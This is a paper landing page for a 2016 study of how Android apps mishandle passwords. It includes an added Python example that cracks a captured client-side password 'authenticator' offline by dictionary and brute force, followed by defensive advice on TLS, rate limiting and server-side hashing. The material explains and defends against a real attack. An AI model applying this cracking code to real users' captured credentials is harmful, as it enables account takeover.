
Open Sesame! Web Authentication Cracking via Mobile App Analysis

  • Conference paper
  • Web Technologies and Applications (APWeb 2016)
  • Part of the book series: Lecture Notes in Computer Science (LNISA, volume 9932)

Abstract

Web authentication security can be undermined by flawed mobile web implementations. Mobile web implementations may use a less secure transport channel and enforce less strict brute-force protection, making web authentication services vulnerable to typical attacks such as password cracking. This paper presents in-depth penetration testing based on a comprehensive dynamic app analysis that focuses on vulnerable authentication implementations in Android apps. We analyze the Top 200 apps from China Android Market and the Top 100 apps from Google Play. The results show that 71.3 % of the apps we analyze fail to protect users' passwords appropriately, and an experiment carried out with 20 volunteers indicates that 84.4 % of their passwords can be cracked given knowledge of the password transformation process.


Notes

  1. During user authentication, an app typically receives a password, encodes or encrypts it, and sends the result together with other data to a remote web server. We let authenticator denote this result for the rest of this paper.

  2. Other apps are either packed or call native APIs, in which case manual intervention is needed.
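To make Note 1 concrete, here is an added example (not code from the paper or its authors) of what "knowledge of the password transformation process" buys an attacker. Once the deterministic client-side transformation that produces the authenticator is recovered from the app, any authenticator captured from a login request can be attacked offline with a dictionary or brute force, with no server-side rate limit in the way. The transformation (MD5 over a fixed, app-embedded salt), the salt constant, the base wordlist and the "captured" value are all constructed assumptions for this example and are not taken from the paper.

```python
"""Offline cracking of a client-side password 'authenticator'.

Added example, not from the paper. Assumes a hypothetical app whose
transformation has been recovered by static or dynamic analysis.
"""
import hashlib
import hmac
import itertools
import string
from typing import Callable, Iterable, Iterator, Optional

# ASSUMPTION: hypothetical app-side transformation. Neither the constant nor
# the use of MD5 comes from the paper; they stand in for whatever a real app
# embeds (a fixed salt in the APK, a fast hash over salt + password).
APP_CONSTANT_SALT = b"com.example.shop:v1"


def app_authenticator(password: str) -> str:
    """Client-side transformation exactly as the (hypothetical) app computes it."""
    return hashlib.md5(APP_CONSTANT_SALT + password.encode("utf-8")).hexdigest()


def mangle(word: str) -> Iterator[str]:
    """Small rule set: the word itself, capitalised, each with common suffixes."""
    variants = [word, word.capitalize()]
    for base in list(variants):
        for suffix in ("1", "123", "2016", "!"):
            variants.append(base + suffix)
    yield from variants


def crack_authenticator(observed: str, candidates: Iterable[str],
                        transform: Callable[[str], str] = app_authenticator) -> Optional[str]:
    """Return the first candidate whose transformed value equals the observed one."""
    for candidate in candidates:
        if hmac.compare_digest(transform(candidate), observed):
            return candidate
    return None


def dictionary_attack(observed: str, base_words: Iterable[str]) -> Optional[str]:
    """Dictionary attack with the mangling rules applied to every base word."""
    return crack_authenticator(observed, (v for w in base_words for v in mangle(w)))


def brute_force(observed: str, max_len: int = 4,
                alphabet: str = string.ascii_lowercase + string.digits) -> Optional[str]:
    """Exhaustive search over short passwords; a fast hash makes this cheap."""
    def space() -> Iterator[str]:
        for length in range(1, max_len + 1):
            for chars in itertools.product(alphabet, repeat=length):
                yield "".join(chars)
    return crack_authenticator(observed, space())


# Constructed sample: the authenticator an attacker would capture from the
# login request (e.g. over plaintext HTTP). Computed here so the file runs offline.
CAPTURED_AUTHENTICATOR = app_authenticator("Sunshine123")
BASE_WORDS = ["password", "welcome", "sunshine", "letmein"]

if __name__ == "__main__":
    print("dictionary:", dictionary_attack(CAPTURED_AUTHENTICATOR, BASE_WORDS))
    print("brute force:", brute_force(app_authenticator("ab1"), max_len=3))
```

Two practical takeaways follow from this. First, a client-side transformation is never a secret: it ships in the APK, so it provides no protection beyond what the transport channel gives, and a captured authenticator is both crackable offline and directly replayable. Second, the only brute-force defences that hold are the ones the attacker cannot run locally: TLS for the channel, server-side rate limiting or lockout on the login endpoint, and a slow, per-user-salted hash applied on the server.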


Acknowledgments

This work is supported by the Major program of Shanghai Science and Technology Commission (15511103002).

Author information

Corresponding author: Hui Liu.

Copyright information

© 2016 Springer International Publishing Switzerland

About this paper

Cite this paper

Liu, H., Zhang, Y., Li, J., Wang, H., Gu, D. (2016). Open Sesame! Web Authentication Cracking via Mobile App Analysis. In: Li, F., Shim, K., Zheng, K., Liu, G. (eds) Web Technologies and Applications. APWeb 2016. Lecture Notes in Computer Science, vol 9932. Springer, Cham. https://doi.org/10.1007/978-3-319-45817-5_51

  • DOI: https://doi.org/10.1007/978-3-319-45817-5_51
  • Publisher Name: Springer, Cham
  • Print ISBN: 978-3-319-45816-8
  • Online ISBN: 978-3-319-45817-5
